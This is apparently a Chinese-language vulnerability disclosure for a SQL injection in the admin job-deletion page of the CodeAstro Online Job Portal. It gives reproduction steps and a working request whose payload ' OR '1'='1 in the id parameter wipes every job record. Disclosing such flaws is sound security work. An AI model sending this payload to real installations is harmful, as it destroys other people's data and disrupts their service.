在 CodeAstro Online Job Portal 的管理员职位删除功能中发现了一个 SQL 注入漏洞。
该应用程序直接在 SQL 查询中使用 id 参数,未进行适当的验证或参数绑定。因此,攻击者可以通过注入恶意输入来修改查询。
通过利用此问题,经过身份验证的用户可以更改预期的查询逻辑,从数据库中删除所有职位记录,而不仅仅是单个条目。
登录管理面板。
前往:
/admin/jobs-admins/show-jobs.php

确认存在多个职位条目。
发送以下请求:
GET /admin/jobs-admins/delete-jobs.php?id=48' OR '1'='1 HTTP/1.1
Host: target

数据库中的所有职位条目均被删除,而不仅仅是单个条目。

' OR '1'='1
经过身份验证的攻击者可以删除系统中的所有职位发布,导致完全的数据丢失和服务中断。
https://codeastro.com/online-job-portal-project-in-php-mysql-with-source-code/